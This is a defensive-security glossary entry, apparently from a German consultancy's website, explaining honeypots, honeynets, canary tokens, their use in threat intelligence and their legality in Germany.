Skip to content

Services, Wiki-Artikel, Blog-Beiträge und Glossar-Einträge durchsuchen

↑↓NavigierenEnterÖffnenESCSchließen
Defensive Security Glossary

Honeypot

A single-bait system that lures attackers and records their behavior. Every connection is automatically flagged as suspicious—no false positives are possible. Honeypots form the foundation: Deception Technology and honeypot-deception extend this concept to include canary tokens, fake credentials, and entire honeynet infrastructures.

A honeypot is a decoy system: It looks like a real, valuable server to attackers—but it is a monitored trap that records the attacker’s activities and triggers alerts as soon as someone interacts with it.

How a Honeypot Works

In addition to real production servers, the network contains a honeypot server that is intentionally made to look "vulnerable." When an attacker touches the honeypot:

  • Alert sent to SOC/SIEM
  • All activities are logged
  • The attacker’s tactics become visible

Basic Principle: No one should touch a honeypot—no legitimate user has a reason to do so. Any connection to the honeypot is automatically suspicious.

Types of Honeypots

Low-Interaction Honeypots:

  • Simulate specific services (e.g., SSH, HTTP) without a real operating system
  • Easy to operate, low risk
  • Collect basic intelligence: Who is scanning, which exploits are being attempted?
  • Tools: Honeyd, Cowrie (SSH/Telnet), Dionaea

High-Interaction Honeypots:

  • Real systems with real software, intentionally poorly secured
  • Attackers can interact more deeply—and are closely monitored
  • High risk: Attackers could use the honeypot as a springboard
  • Requires strict network monitoring and containment

Honeynets:

  • An entire simulated network consisting of multiple honeypots
  • Simulates a complete IT infrastructure
  • Used for research to study attack patterns

Deception Technology:

  • Modern advancement: Fake credentials (honeytokens), fake files (canary tokens), fake database entries
  • Easier to deploy, highly effective

Canary Tokens - Honeypots for Everyone

Canary Tokens (canarytokens.org) provide the following for free:

  • Fake DNS tokens: A domain name that triggers an alert when someone resolves it
  • Fake AWS keys: Fake credentials that trigger an alert when used
  • Fake Word document: Opening it triggers an alert
  • Fake password file ("passwords.xlsx"): Opening it = Alert

Practical example: A file named "Passwords_2026.xlsx" as a Canary Token on a file server. If an attacker (or a curious employee) opens it, it immediately sends a notification.

Honeypots and Threat Intelligence

Honeypots are valuable sources of Threat Intelligence:

  • Which exploits are actively being used?
  • Which IP addresses and botnet infrastructure are being used?
  • Which malware is being dropped?
  • What tactics do attackers use after initial access?

Security firms operate global honeypot networks (e.g., Shodan, GreyNoise) to identify attack trends.

In Germany: Honeypots are legal—as long as they do not actively induce criminal acts by the attacker (no "agent provocateur" situation). Merely observing and documenting attacks is permitted. Honeypot operators should clarify the legal framework with a specialist, particularly if honeypot data is to be used for law enforcement purposes.

Honeypots in a Zero-Trust Context

In a zero-trust architecture, honeypots and deception technologies complement the traditional security stack: They assume that attackers are already inside the network—and use decoys to detect and track them.

AWARE7 Services on This Topic

Penetrationstest
Back to Glossary Book a free consultation